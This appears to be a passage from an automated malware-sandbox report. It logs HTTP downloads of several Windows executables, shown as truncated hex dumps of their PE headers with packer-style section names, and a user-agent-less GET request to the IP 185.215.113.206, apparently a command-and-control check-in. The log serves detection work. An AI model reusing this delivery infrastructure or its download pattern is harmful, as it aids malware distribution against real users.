00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 12 Nov 2024 12:35:37 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "6dde8-5e7e950876500"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 12 Nov 2024 12:35:38 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "1f3950-5e7e950876500"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 12 Nov 2024 12:35:40 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "3ef50-5e7e950876500"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 12 Nov 2024 12:35:41 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "13bf0-5e7e950876500"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 12 Nov 2024 12:35:45 GMTContent-Type: application/octet-streamContent-Length: 3224064Last-Modified: Tue, 12 Nov 2024 12:24:58 GMTConnection: keep-aliveETag: "6733491a-313200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 ca 01 00 00 00 00 00 00 40 31 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 70 31 00 00 04 00 00 e2 ad 31 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 64 27 31 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 14 27 31 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 80 06 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 90 06 00 00 02 00 00 00 90 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 92 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 65 64 63 6b 78 6c 68 79 00 80 2a 00 00 b0 06 00 00 78 2a 00 00 94 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 66 68 77 65 6f 63 74 77 00 10 00 00 00 30 31 00 00 04 00 00 00 0c 31 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 40 31 00 00 22 00 00 00 10 31 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 12 Nov 2024 12:36:08 GMTContent-Type: application/octet-streamContent-Length: 1782784Last-Modified: Tue, 12 Nov 2024 12:24:50 GMTConnection: keep-aliveETag: "67334912-1b3400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ce ac e2 38 8a cd 8c 6b 8a cd 8c 6b 8a cd 8c 6b e5 bb 27 6b 92 cd 8c 6b e5 bb 12 6b 87 cd 8c 6b e5 bb 26 6b b0 cd 8c 6b 83 b5 0f 6b 89 cd 8c 6b 83 b5 1f 6b 88 cd 8c 6b 0a b4 8d 6a 89 cd 8c 6b 8a cd 8d 6b d1 cd 8c 6b e5 bb 23 6b 98 cd 8c 6b e5 bb 11 6b 8b cd 8c 6b 52 69 63 68 8a cd 8c 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 4f c3 2f 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 40 22 00 00 00 00 00 00 80 68 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 b0 68 00 00 04 00 00 d1 aa 1b 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4d b0 24 00 61 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 b1 24 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 90 24 00 00 10 00 00 00 62 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 a0 24 00 00 00 00 00 00 72 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 b0 24 00 00 02 00 00 00 72 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 10 2a 00 00 c0 24 00 00 02 00 00 00 74 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6d 76 6c 6b 6a 72 64 7a 00 a0 19 00 00 d0 4e 00 00 98 19 00 00 76 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 71 77 6e 7a 6d 6c 68 62 00 10 00 00 00 70 68 00 00 04 00 00 00 0e 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 80 68 00 00 22 00 00 00 12 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 12 Nov 2024 12:36:20 GMTContent-Type: application/octet-streamContent-Length: 2745856Last-Modified: Tue, 12 Nov 2024 12:23:54 GMTConnection: keep-aliveETag: "673348da-29e600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 60 2a 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 2a 00 00 04 00 00 1e 76 2a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 6d 6f 78 6e 6b 6d 65 61 00 a0 29 00 00 a0 00 00 00 84 29 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 77 62 71 67 62 6a 64 70 00 20 00 00 00 40 2a 00 00 06 00 00 00 be 29 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 60 2a 00 00 22 00 00 00 c4 29 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
